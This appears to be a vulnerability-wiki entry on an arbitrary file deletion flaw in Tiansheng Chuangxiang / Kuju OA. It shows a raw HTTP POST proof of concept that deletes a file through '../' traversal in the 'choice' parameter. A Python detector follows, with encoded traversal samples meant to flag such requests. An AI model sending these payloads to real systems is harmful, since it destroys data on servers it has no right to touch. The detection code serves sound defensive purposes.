
Tiansheng Chuangxiang OA (天生创想OA) & Kuju OA (苦菊OA) Arbitrary File Deletion Vulnerability

A free, open vulnerability database that anyone can edit -- PwnWiki.com


POC

Delete 1.php

POST /admin.php?ac=data&fileurl=mana&do=update HTTP/1.1
Host: www.kuju.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.kuju.com/admin.php?ac=data&fileurl=mana&do=data_import
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://www.kuju.com
Connection: close
Cookie: toa_auth=MQk4MWRiMDNkZTA5ZWYxZWIyYjc5NjBkNDNmMWEwY2U3MQ%3D%3D; my_expand_3=; my_expand_all_3=
Upgrade-Insecure-Requests: 1
 
choice=../1.php&do=%E5%88%A0+%E9%99%A4
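
A defensive check for the request pattern above, as an added example that is not part of the original page or the vendor's code: it flags POSTs to the data-management update action whose `choice` value would resolve outside the directory it is joined to. The function names and sample bodies are constructed for illustration; only the endpoint parameters (`ac=data`, `do=update`, `choice`) come from the PoC.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample requests (method, request target, form body); not captured traffic.
SAMPLES = [
    ("POST", "/admin.php?ac=data&fileurl=mana&do=update", "choice=../1.php&do=%E5%88%A0+%E9%99%A4"),
    ("POST", "/admin.php?ac=data&fileurl=mana&do=update", "choice=backup_2021.sql&do=x"),
    ("POST", "/admin.php?ac=data&fileurl=mana&do=update", "choice=%252e%252e%252f1.php"),
    ("POST", "/admin.php?ac=data&fileurl=mana&do=update", "choice=..%5C1.php"),
    ("GET", "/admin.php?ac=data&fileurl=mana&do=data_import", ""),
]

def escapes_base(value: str) -> bool:
    """True if a file name would resolve outside the directory it is joined to."""
    prev = None
    while prev != value:              # decode until stable to catch double encoding
        prev, value = value, unquote(value)
    value = value.replace("\\", "/")  # treat Windows separators like POSIX ones
    if "\x00" in value or value.startswith("/"):
        return True                   # NUL truncation or absolute path
    if len(value) > 1 and value[1] == ":":
        return True                   # Windows drive-letter path
    norm = posixpath.normpath(value)  # collapses "a/../.." into "../"
    return norm == ".." or norm.startswith("../")

def check_request(method: str, target: str, body: str) -> list:
    """Return the `choice` values of a data update POST that traverse directories."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if method != "POST" or not url.path.endswith("/admin.php"):
        return []
    if query.get("ac") != ["data"] or query.get("do") != ["update"]:
        return []
    form = parse_qs(body, keep_blank_values=True)
    return [c for c in form.get("choice", []) if escapes_base(c)]

def scan(samples):
    """Return (index, offending values) for each sample request that should be blocked."""
    hits = []
    for i, (method, target, body) in enumerate(samples):
        bad = check_request(method, target, body)
        if bad:
            hits.append((i, bad))
    return hits

if __name__ == "__main__":
    for index, values in scan(SAMPLES):
        print(f"sample {index}: traversal in choice -> {values!r}")
```

The same normalise-then-compare logic belongs in the application's delete handler as well, so the file name is rejected server-side even when no filtering proxy sits in front of it.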
